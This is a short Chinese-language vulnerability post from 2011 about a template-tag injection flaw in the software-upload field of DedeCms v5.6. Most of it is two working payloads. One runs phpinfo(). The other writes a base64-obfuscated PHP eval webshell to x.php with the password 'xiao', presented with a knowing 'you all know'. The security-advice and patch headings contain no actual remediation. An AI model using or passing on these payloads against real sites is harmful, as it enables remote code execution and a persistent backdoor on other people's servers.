DedeCms v5.6 嵌入惡意代碼執行漏洞及修復
添加時間:2011-3-3
添加:
admin
在上傳軟件的地方,對本地地址沒有進行有效的驗證,可以被惡意利用
<*參考 toby57*>
測試方法:
注冊會員,上傳軟件:本地地址中填入
a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},
發表后查看或修改即可執行
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
生成x.php 密碼:xiao直接生成一句話。密碼xiao
大家懂得
安全建議:
廠商補丁:
DEDECMS
------------
關健詞:DedeCms v5.6
新文章:
- CentOS7下圖形配置網絡的方法
- CentOS 7如何添加刪除用戶
- 如何解決centos7雙系統后丟失windows啟動項
- CentOS單網卡如何批量添加不同IP段
- CentOS下iconv命令的介紹
- Centos7 SSH密鑰登陸及密碼密鑰雙重驗證詳解
- CentOS 7.1添加刪除用戶的方法
- CentOS查找/掃描局域網打印機IP講解
- CentOS7使用hostapd實現無AP模式的詳解
- su命令不能切換root的解決方法
- 解決VMware下CentOS7網絡重啟出錯
- 解決Centos7雙系統后丟失windows啟動項
- CentOS下如何避免文件覆蓋
- CentOS7和CentOS6系統有什么不同呢
- Centos 6.6默認iptable規則詳解